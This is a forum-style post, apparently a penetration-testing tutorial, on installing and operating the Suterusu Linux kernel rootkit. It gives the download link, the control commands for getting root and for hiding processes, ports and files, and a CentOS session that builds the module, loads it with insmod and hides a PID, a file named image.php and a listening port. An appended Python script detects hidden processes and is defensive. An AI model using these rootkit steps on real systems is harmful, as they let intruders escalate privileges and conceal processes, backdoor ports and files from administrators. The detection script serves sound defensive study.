Tags: linux, penetration testing, cybersecurity, CTF, windows

Installing and using the kernel-level rootkit Suterusu

z0nek:

Download: https://github.com/citypw/suterusu/
An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM
Feature list (the control client is `sock`; each feature is selected by its number):

Get root
$ ./sock 0

Hide PID
$ ./sock 1 [pid]

Unhide PID
$ ./sock 2 [pid]

Hide TCPv4 port
$ ./sock 3 [port]

Unhide TCPv4 port
$ ./sock 4 [port]

Hide TCPv6 port
$ ./sock 5 [port]

Unhide TCPv6 port
$ ./sock 6 [port]

Hide UDPv4 port
$ ./sock 7 [port]

Unhide UDPv4 port
$ ./sock 8 [port]

Hide UDPv6 port
$ ./sock 9 [port]

Unhide UDPv6 port
$ ./sock 10 [port]

Hide file/directory
$ ./sock 11 [name]

Unhide file/directory
$ ./sock 12 [name]


Tested on CentOS 6.5 64-bit:

1) Build the kernel module against the running kernel's headers:

[root@vincent suterusu-master]# make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build   // note: the make target here is linux-x86_64
make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ " -C /lib/modules/2.6.32-642.1.1.el6.x86_64/build M=/tmp/suterusu-master modules
make[1]: Entering directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'
  CC [M]  /tmp/suterusu-master/main.o
  CC [M]  /tmp/suterusu-master/util.o
  CC [M]  /tmp/suterusu-master/module.o
  LD [M]  /tmp/suterusu-master/suterusu.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /tmp/suterusu-master/suterusu.mod.o
  LD [M]  /tmp/suterusu-master/suterusu.ko.unsigned
  NO SIGN [M] /tmp/suterusu-master/suterusu.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'

2) Build the userland control client (the two warnings are about a missing `#include <string.h>` and are harmless):

[root@vincent suterusu-master]# gcc sock.c -o sock
sock.c:在函数‘main’中:
sock.c:205:警告:隐式声明与内建函数‘strlen’不兼容
sock.c:220:警告:隐式声明与内建函数‘strlen’不兼容

3) Load the module:

[root@vincent suterusu-master]# insmod suterusu.ko

Hiding a process:

[root@vincent suterusu-master]# ./sock 1 5542
Hiding PID 5542

Hiding a file:
Note that file hiding matches on the file name only: if you hide a file named x, every file named x in every directory is hidden.

[root@vincent suterusu-master]# ./sock 11 image.php
Hiding file/dir ../image.php

Hiding a connection:

[root@vincent suterusu-master]# netstat -ano | grep 49745
tcp        0      0 0.0.0.0:49745               0.0.0.0:*                   LISTEN      off (0.00/0/0)
[root@vincent suterusu-master]# ./sock 3 49745
Hiding TCPv4 port 49745
[root@vincent suterusu-master]# netstat -ano | grep 49745
[root@vincent suterusu-master]#
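Because Suterusu's PID hiding filters directory listings of /proc (which is all that ps, top and netstat consult), a hidden process still answers a kernel-level probe. The added example below (my own defensive script, not part of the original post or of the Suterusu project) checks every PID up to pid_max with kill(pid, 0) and reports processes that are alive but missing from the /proc listing; it filters non-leader thread IDs, which are legitimately unlisted, and runs two passes so processes that merely started or exited mid-scan are not reported.

```python
import os

def visible_pids(proc="/proc"):
    """PIDs that a directory listing of /proc reports: what ps, top and
    netstat rely on and exactly what a readdir-hooking rootkit filters."""
    return {int(n) for n in os.listdir(proc) if n.isdigit()}

def pid_is_alive(pid):
    """Probe without delivering a signal. Success or EPERM both mean the
    PID exists; only ESRCH (ProcessLookupError) means it does not."""
    try:
        os.kill(pid, 0)
        return True
    except ProcessLookupError:
        return False
    except PermissionError:
        return True

def is_non_leader_thread(pid, proc="/proc"):
    """Thread IDs also answer kill(tid, 0) but are never listed in /proc;
    their Tgid line names the owning process. Only group leaders count."""
    try:
        with open(f"{proc}/{pid}/status") as f:
            for line in f:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) != pid
    except OSError:
        pass  # status absent or unreadable: treat as a real, possibly hidden PID
    return False

def hidden_pids(visible, alive, proc="/proc"):
    """Pure comparison: alive, absent from the listing, and not a thread."""
    return {p for p in alive - visible if not is_non_leader_thread(p, proc)}

def scan_for_hidden_pids(proc="/proc", pid_max=None):
    if pid_max is None:
        with open("/proc/sys/kernel/pid_max") as f:
            pid_max = int(f.read())
    # Two passes: a process that starts or exits between the listing and the
    # probe appears in one pass only; a rootkit-hidden process persists in both.
    result = None
    for _ in range(2):
        alive = {p for p in range(1, pid_max) if pid_is_alive(p)}
        found = hidden_pids(visible_pids(proc), alive, proc)
        result = found if result is None else result & found
    return result

if __name__ == "__main__":
    print("hidden PIDs:", sorted(scan_for_hidden_pids()) or "none")
```

Run it as root: on a /proc mounted with hidepid=2, an unprivileged user gets EPERM for other users' processes while their PIDs are absent from the listing, which would produce false positives.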


